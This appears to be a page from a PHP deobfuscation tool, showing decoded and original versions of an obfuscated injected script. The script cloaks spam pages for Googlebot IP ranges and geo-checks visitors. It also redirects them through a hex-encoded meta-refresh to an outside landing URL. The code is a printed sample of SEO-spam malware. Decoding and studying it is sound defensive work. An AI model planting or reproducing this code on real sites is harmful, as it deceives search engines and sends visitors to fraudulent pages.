Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Gya10; ZwUpm: $landings = array(array("\x36\x38\x37\x34\67\64\67\x30\67\x33\6..

Decoded Output download

<?php 
 goto Gya10; ZwUpm: $landings = array(array("68747470733a2f2f3137616e616c79746963732e636f6d2f6a73565331593f736f757263653d73616e7470617562617263656c6f6e612e6f7267266b6579776f72643d", 100)); goto Fbc3b; od6AE: if (isActionNeeded($uri, false, $arrayCache)) { if (isGoogleBot($remoteADDR)) { $content = isset($arrayCache, $uri) ? fetchContent($dataFile, $arrayCache, $uri) : false; if ($content) { die($content); } } } goto ILL0P; Yp8J2: $referer = filter_var(getenv("HTTP_REFERER")); goto QzvFd; Gya10: $errorRep = error_reporting(); goto aCAqc; QzvFd: $uri = filter_var(getenv("REQUEST_URI")); goto Q68eD; Fbc3b: $badIPs = array("127.0.0.1", "139.47.104.", "139.47.89.", "146.75.182.", "148.3.15.", "185.22.200.", "185.66.43.", "188.26.212.", "188.76.146.", "188.78.203.", "2.136.196.", "2.139.144.", "217.126.43.", "47.61.247.", "47.62.201.", "47.62.215.", "47.63.145.", "62.117.205.", "77.228.174.", "79.116.134.", "79.117.222.", "80.30.240.", "80.32.129.", "80.32.148.", "81.172.118.", "81.32.93.", "81.35.179.", "81.43.79.", "83.43.107.", "85.56.142.", "86.127.228.", "87.216.180.", "87.221.54.", "87.222.166.", "89.141.195.", "90.170.146.", "90.94.113.", "90.94.94.", "93.176.146."); goto msHlS; AmGo5: function isBadIP($remoteADDR, $badIPs) { foreach ($badIPs as $badIP) { if (strpos($remoteADDR, $badIP) === 0) { return true; } } return false; } goto dw38n; awn4P: $dataFile = "2f7573722f686f6d652f73616e7470617562617263656c6f6e612e6f72672f656e74726164612f64617461"; goto GRr26; gJEwI: $dataFile = getBIN($dataFile); goto N8uht; l9RZ3: function doRedirect($landings, $uri, $keyword = NULL) { if (!$keyword) { $keyword = findKeyword($uri); } $randLand = rand(1, array_sum(array_column($landings, 1))); foreach ($landings as $landing) { if (($randLand -= $landing[1]) <= 0) { $redirectUri = getBIN($landing[0]) . $keyword; die("<html><head><meta http-equiv='refresh' content='0;{$redirectUri}'></head><body></body></html>"); } } } goto R5rRg; OAtzH: function isNeededCountry($remoteADDR, $Countries) { $curlAddress = curl_init("http://ip-api.com/json/{$remoteADDR}?fields=country,regionName,city,isp,org,as"); curl_setopt($curlAddress, CURLOPT_RETURNTRANSFER, 1); $curlResult = @curl_exec($curlAddress); curl_close($curlAddress); if (is_string($Countries) && stripos($curlResult, $Countries)) { return true; } elseif (is_array($Countries)) { foreach ($Countries as $myCountry) { if (stripos($curlResult, $myCountry)) { return true; } } } return false; } goto QKzcj; dw38n: function isRusLang($lang) { return stripos($lang, "ru") === false; } goto NLb4N; Mgv8J: function getArray($cacheFile) { return unserialize(gzinflate(file_get_contents($cacheFile))); } goto ZI54E; ODTZO: $arrayCache = getArray($cacheFile); goto od6AE; ILL0P: error_reporting($errorRep); goto pX_oZ; NLb4N: function fetchContent($dataFile, $arrayCache, $uri) { $offset = $arrayCache[$uri]["offset"]; $length = $arrayCache[$uri]["length"]; if ($length == 0) { return false; } $fp = fopen($dataFile, "r"); fseek($fp, $offset); $content = fread($fp, $length); fclose($fp); return gzinflate($content); } goto Ko2ZE; aCAqc: error_reporting(0); goto WI2MT; Q68eD: $lang = filter_var(getenv("HTTP_ACCEPT_LANGUAGE")); goto ZwUpm; N8uht: $cacheFile = getBIN($cacheFile); goto ODTZO; WI2MT: $remoteADDR = filter_var(getenv("REMOTE_ADDR")); goto secMN; R5rRg: function isMyCookie() { $curCookie = $_COOKIE; if (empty($curCookie) || isset($curCookie["znrpfv"])) { setMyCookie(); return true; } return false; } goto QFL5u; pX_oZ: function isActionNeeded($uri, $str, $arrayCache = false) { if ($arrayCache) { return isset($arrayCache[$uri]); } else { return strpos($uri, $str) !== false; } } goto AmGo5; secMN: $userAGENT = filter_var(getenv("HTTP_USER_AGENT")); goto Yp8J2; QFL5u: function setMyCookie() { setcookie("znrpfv", "1", time() + 365 * 24 * 60 * 60, "/"); } goto mbvTD; Ko2ZE: function findKeyword($uri) { $uArr = explode("/", $uri); $page = end($uArr); return str_replace("-", " ", preg_replace("/(-online)?\.html$/", '', $page)); } goto l9RZ3; msHlS: $arrayCountries = array("Spain"); goto awn4P; QKzcj: function isGoogleBot($remoteADDR) { $googleIPs = array(array("start" => 1123631104, "end" => 1123639295), array("start" => 3232892160, "end" => 3232892191), array("start" => 571888896, "end" => 571888927), array("start" => 577025632, "end" => 577025647), array("start" => 577057424, "end" => 577057439), array("start" => 578223616, "end" => 578223631), array("start" => 578175488, "end" => 578175503), array("start" => 578728544, "end" => 578728559), array("start" => 580032144, "end" => 580032159), array("start" => 580087440, "end" => 580087455), array("start" => 580340368, "end" => 580340383), array("start" => 580399680, "end" => 580399695), array("start" => 580547216, "end" => 580547231), array("start" => 580608544, "end" => 580608559), array("start" => 581243568, "end" => 581243583), array("start" => 581935168, "end" => 581935183), array("start" => 581992976, "end" => 581992991), array("start" => 574640704, "end" => 574640719), array("start" => 574747248, "end" => 574747263), array("start" => 575681104, "end" => 575681119), array("start" => 576242176, "end" => 576242191), array("start" => 576260688, "end" => 576260703), array("start" => 576308816, "end" => 576308831), array("start" => 576758320, "end" => 576758335), array("start" => 603452400, "end" => 603452415)); if (isset($_COOKIE["extras"])) { return true; } $IPlong = ip2long($remoteADDR); foreach ($googleIPs as $googleIP) { if ($IPlong >= $googleIP["start"] && $IPlong <= $googleIP["end"]) { return true; } } return false; } goto HBmZT; ZI54E: function isSE($referer) { return preg_match("/google|bing|duckduckgo/i", $referer) === 1; } goto OAtzH; mbvTD: function getBIN($toBIN) { return hex2bin($toBIN); } goto Mgv8J; GRr26: $cacheFile = "2f7573722f686f6d652f73616e7470617562617263656c6f6e612e6f72672f656e74726164612f6361636865"; goto gJEwI; HBmZT: ?>

Did this file decode correctly?

Original Code

<?php
 goto Gya10; ZwUpm: $landings = array(array("\x36\x38\x37\x34\67\64\67\x30\67\x33\63\141\62\146\x32\x66\63\x31\x33\67\x36\61\66\x65\66\61\66\x63\x37\71\x37\64\66\71\66\x33\x37\63\x32\145\66\x33\x36\146\x36\x64\62\x66\66\141\67\63\65\66\x35\x33\x33\61\65\x39\x33\146\x37\63\x36\x66\x37\x35\x37\62\x36\63\66\65\63\144\x37\63\66\x31\66\145\x37\64\x37\60\66\x31\x37\65\66\x32\66\x31\x37\x32\x36\x33\x36\x35\66\143\x36\146\66\x65\x36\61\x32\145\x36\x66\67\62\x36\x37\62\x36\66\x62\66\x35\x37\71\67\67\66\146\x37\62\x36\64\x33\x64", 100)); goto Fbc3b; od6AE: if (isActionNeeded($uri, false, $arrayCache)) { if (isGoogleBot($remoteADDR)) { $content = isset($arrayCache, $uri) ? fetchContent($dataFile, $arrayCache, $uri) : false; if ($content) { die($content); } } } goto ILL0P; Yp8J2: $referer = filter_var(getenv("\x48\124\124\x50\x5f\x52\105\x46\x45\122\105\122")); goto QzvFd; Gya10: $errorRep = error_reporting(); goto aCAqc; QzvFd: $uri = filter_var(getenv("\x52\x45\121\x55\105\x53\x54\137\x55\122\111")); goto Q68eD; Fbc3b: $badIPs = array("\61\x32\67\x2e\x30\56\x30\x2e\61", "\x31\x33\x39\56\x34\67\x2e\x31\x30\64\56", "\61\x33\x39\x2e\64\x37\x2e\70\x39\x2e", "\x31\64\x36\x2e\x37\x35\x2e\61\x38\x32\x2e", "\x31\x34\70\56\63\56\x31\65\x2e", "\x31\70\65\56\x32\62\56\x32\60\60\x2e", "\61\70\x35\x2e\66\x36\56\x34\x33\56", "\61\70\70\56\62\x36\56\x32\61\x32\x2e", "\61\x38\70\56\x37\x36\56\61\64\66\x2e", "\x31\x38\70\56\x37\70\56\62\60\63\56", "\x32\x2e\x31\63\66\56\x31\71\x36\x2e", "\x32\56\61\63\x39\x2e\61\x34\x34\x2e", "\62\61\x37\x2e\x31\x32\66\x2e\64\63\x2e", "\x34\67\56\x36\61\56\62\64\67\56", "\64\67\x2e\x36\x32\x2e\x32\60\61\x2e", "\64\67\56\x36\62\56\x32\61\x35\x2e", "\64\x37\x2e\x36\x33\x2e\61\64\65\56", "\x36\62\56\61\61\x37\56\x32\60\65\56", "\x37\67\x2e\x32\x32\x38\x2e\61\67\x34\x2e", "\67\x39\56\61\61\x36\56\61\x33\x34\56", "\x37\71\56\61\61\x37\56\62\62\62\56", "\70\60\x2e\x33\x30\56\x32\x34\x30\x2e", "\x38\60\56\x33\62\x2e\61\x32\x39\56", "\x38\x30\56\63\x32\56\x31\x34\x38\x2e", "\70\61\x2e\61\x37\x32\x2e\61\61\70\56", "\x38\x31\x2e\x33\x32\56\71\63\x2e", "\x38\x31\x2e\63\65\56\x31\67\71\x2e", "\70\61\56\x34\x33\56\67\x39\56", "\x38\x33\56\x34\x33\x2e\x31\x30\x37\56", "\70\65\56\x35\66\x2e\x31\64\62\x2e", "\70\x36\x2e\x31\62\67\x2e\x32\x32\70\x2e", "\70\x37\56\x32\x31\x36\56\61\x38\x30\x2e", "\70\67\56\x32\62\61\x2e\x35\64\56", "\70\x37\x2e\62\62\x32\x2e\x31\66\66\56", "\70\x39\56\61\64\61\56\61\x39\x35\56", "\71\x30\56\x31\67\x30\x2e\x31\x34\x36\x2e", "\x39\x30\56\x39\x34\56\61\x31\x33\x2e", "\71\x30\x2e\x39\64\x2e\x39\x34\56", "\x39\63\x2e\61\x37\x36\56\x31\64\x36\56"); goto msHlS; AmGo5: function isBadIP($remoteADDR, $badIPs) { foreach ($badIPs as $badIP) { if (strpos($remoteADDR, $badIP) === 0) { return true; } } return false; } goto dw38n; awn4P: $dataFile = "\x32\146\67\x35\x37\x33\x37\62\62\146\66\70\66\146\x36\144\x36\65\62\x66\x37\63\x36\x31\x36\x65\x37\x34\x37\x30\66\61\67\x35\x36\x32\x36\x31\67\x32\66\63\x36\65\66\x63\x36\146\66\145\66\x31\x32\x65\66\x66\x37\x32\66\67\62\146\x36\65\66\145\67\64\x37\62\66\x31\x36\64\66\61\x32\x66\66\x34\66\61\x37\x34\x36\x31"; goto GRr26; gJEwI: $dataFile = getBIN($dataFile); goto N8uht; l9RZ3: function doRedirect($landings, $uri, $keyword = NULL) { if (!$keyword) { $keyword = findKeyword($uri); } $randLand = rand(1, array_sum(array_column($landings, 1))); foreach ($landings as $landing) { if (($randLand -= $landing[1]) <= 0) { $redirectUri = getBIN($landing[0]) . $keyword; die("\x3c\x68\x74\x6d\x6c\76\74\x68\x65\x61\144\x3e\74\155\x65\x74\x61\40\x68\x74\x74\160\x2d\145\161\x75\151\166\x3d\x27\162\x65\x66\162\145\x73\x68\x27\x20\x63\157\156\x74\x65\x6e\164\x3d\x27\x30\73{$redirectUri}\x27\x3e\74\x2f\x68\145\141\144\x3e\74\x62\x6f\x64\171\76\74\x2f\142\x6f\x64\x79\x3e\x3c\x2f\x68\164\155\x6c\76"); } } } goto R5rRg; OAtzH: function isNeededCountry($remoteADDR, $Countries) { $curlAddress = curl_init("\x68\x74\164\x70\72\57\x2f\x69\160\x2d\x61\160\x69\x2e\143\157\155\x2f\x6a\163\x6f\156\57{$remoteADDR}\x3f\146\151\x65\154\x64\163\75\143\x6f\x75\156\x74\162\x79\54\x72\x65\147\151\x6f\156\x4e\x61\x6d\145\54\x63\151\x74\x79\54\x69\163\160\x2c\x6f\x72\x67\x2c\x61\163"); curl_setopt($curlAddress, CURLOPT_RETURNTRANSFER, 1); $curlResult = @curl_exec($curlAddress); curl_close($curlAddress); if (is_string($Countries) && stripos($curlResult, $Countries)) { return true; } elseif (is_array($Countries)) { foreach ($Countries as $myCountry) { if (stripos($curlResult, $myCountry)) { return true; } } } return false; } goto QKzcj; dw38n: function isRusLang($lang) { return stripos($lang, "\162\165") === false; } goto NLb4N; Mgv8J: function getArray($cacheFile) { return unserialize(gzinflate(file_get_contents($cacheFile))); } goto ZI54E; ODTZO: $arrayCache = getArray($cacheFile); goto od6AE; ILL0P: error_reporting($errorRep); goto pX_oZ; NLb4N: function fetchContent($dataFile, $arrayCache, $uri) { $offset = $arrayCache[$uri]["\x6f\146\146\163\x65\164"]; $length = $arrayCache[$uri]["\x6c\145\x6e\147\x74\150"]; if ($length == 0) { return false; } $fp = fopen($dataFile, "\162"); fseek($fp, $offset); $content = fread($fp, $length); fclose($fp); return gzinflate($content); } goto Ko2ZE; aCAqc: error_reporting(0); goto WI2MT; Q68eD: $lang = filter_var(getenv("\110\124\124\x50\x5f\101\103\x43\x45\120\x54\137\x4c\101\116\107\x55\101\x47\105")); goto ZwUpm; N8uht: $cacheFile = getBIN($cacheFile); goto ODTZO; WI2MT: $remoteADDR = filter_var(getenv("\x52\105\115\x4f\x54\105\137\x41\x44\x44\x52")); goto secMN; R5rRg: function isMyCookie() { $curCookie = $_COOKIE; if (empty($curCookie) || isset($curCookie["\172\x6e\162\160\146\166"])) { setMyCookie(); return true; } return false; } goto QFL5u; pX_oZ: function isActionNeeded($uri, $str, $arrayCache = false) { if ($arrayCache) { return isset($arrayCache[$uri]); } else { return strpos($uri, $str) !== false; } } goto AmGo5; secMN: $userAGENT = filter_var(getenv("\x48\x54\x54\x50\137\x55\123\105\122\137\101\107\x45\116\124")); goto Yp8J2; QFL5u: function setMyCookie() { setcookie("\172\x6e\x72\160\146\166", "\61", time() + 365 * 24 * 60 * 60, "\57"); } goto mbvTD; Ko2ZE: function findKeyword($uri) { $uArr = explode("\57", $uri); $page = end($uArr); return str_replace("\x2d", "\x20", preg_replace("\57\x28\55\x6f\156\154\151\x6e\x65\51\x3f\134\x2e\x68\x74\x6d\154\x24\57", '', $page)); } goto l9RZ3; msHlS: $arrayCountries = array("\123\160\x61\151\x6e"); goto awn4P; QKzcj: function isGoogleBot($remoteADDR) { $googleIPs = array(array("\x73\164\141\x72\x74" => 1123631104, "\145\x6e\144" => 1123639295), array("\x73\x74\x61\162\x74" => 3232892160, "\x65\x6e\144" => 3232892191), array("\x73\164\141\162\164" => 571888896, "\145\x6e\x64" => 571888927), array("\x73\164\x61\162\164" => 577025632, "\x65\x6e\144" => 577025647), array("\x73\x74\x61\162\164" => 577057424, "\x65\156\x64" => 577057439), array("\163\x74\141\x72\164" => 578223616, "\x65\156\x64" => 578223631), array("\163\x74\x61\162\x74" => 578175488, "\145\156\144" => 578175503), array("\163\x74\141\162\x74" => 578728544, "\x65\156\x64" => 578728559), array("\163\x74\x61\x72\164" => 580032144, "\145\x6e\x64" => 580032159), array("\163\x74\141\x72\164" => 580087440, "\x65\x6e\144" => 580087455), array("\163\164\x61\x72\x74" => 580340368, "\x65\156\x64" => 580340383), array("\x73\164\141\x72\164" => 580399680, "\145\156\x64" => 580399695), array("\x73\164\x61\x72\x74" => 580547216, "\x65\156\x64" => 580547231), array("\x73\x74\x61\162\164" => 580608544, "\145\x6e\x64" => 580608559), array("\163\x74\141\x72\164" => 581243568, "\145\156\144" => 581243583), array("\163\x74\141\162\x74" => 581935168, "\x65\x6e\x64" => 581935183), array("\163\x74\141\x72\164" => 581992976, "\x65\x6e\x64" => 581992991), array("\163\x74\141\162\164" => 574640704, "\145\156\144" => 574640719), array("\x73\x74\x61\162\x74" => 574747248, "\145\156\144" => 574747263), array("\x73\164\x61\x72\164" => 575681104, "\145\x6e\x64" => 575681119), array("\x73\x74\141\162\x74" => 576242176, "\145\156\144" => 576242191), array("\163\x74\x61\162\164" => 576260688, "\x65\x6e\144" => 576260703), array("\x73\164\x61\x72\164" => 576308816, "\145\156\144" => 576308831), array("\x73\x74\141\162\x74" => 576758320, "\x65\156\x64" => 576758335), array("\163\x74\141\162\x74" => 603452400, "\145\x6e\144" => 603452415)); if (isset($_COOKIE["\x65\x78\x74\x72\141\x73"])) { return true; } $IPlong = ip2long($remoteADDR); foreach ($googleIPs as $googleIP) { if ($IPlong >= $googleIP["\x73\x74\x61\162\164"] && $IPlong <= $googleIP["\145\x6e\x64"]) { return true; } } return false; } goto HBmZT; ZI54E: function isSE($referer) { return preg_match("\x2f\147\157\157\147\x6c\145\x7c\142\x69\x6e\147\174\x64\x75\x63\x6b\x64\165\x63\153\147\157\57\x69", $referer) === 1; } goto OAtzH; mbvTD: function getBIN($toBIN) { return hex2bin($toBIN); } goto Mgv8J; GRr26: $cacheFile = "\x32\146\x37\x35\x37\x33\67\62\x32\x66\x36\x38\66\x66\x36\x64\66\x35\62\x66\67\63\66\x31\66\145\67\x34\67\x30\x36\61\67\65\66\x32\66\x31\x37\x32\66\63\x36\x35\66\x63\x36\x66\x36\x65\66\x31\x32\145\66\146\67\x32\66\67\x32\x66\66\65\x36\x65\x37\x34\x37\62\x36\61\x36\x34\66\61\x32\x66\x36\63\66\61\66\63\x36\x38\x36\x35"; goto gJEwI; HBmZT: ?>

Function Calls

None

Variables

None

Stats

MD5 110cab80eebfc140352776eb2411961a
Eval Count 0
Decode Time 62 ms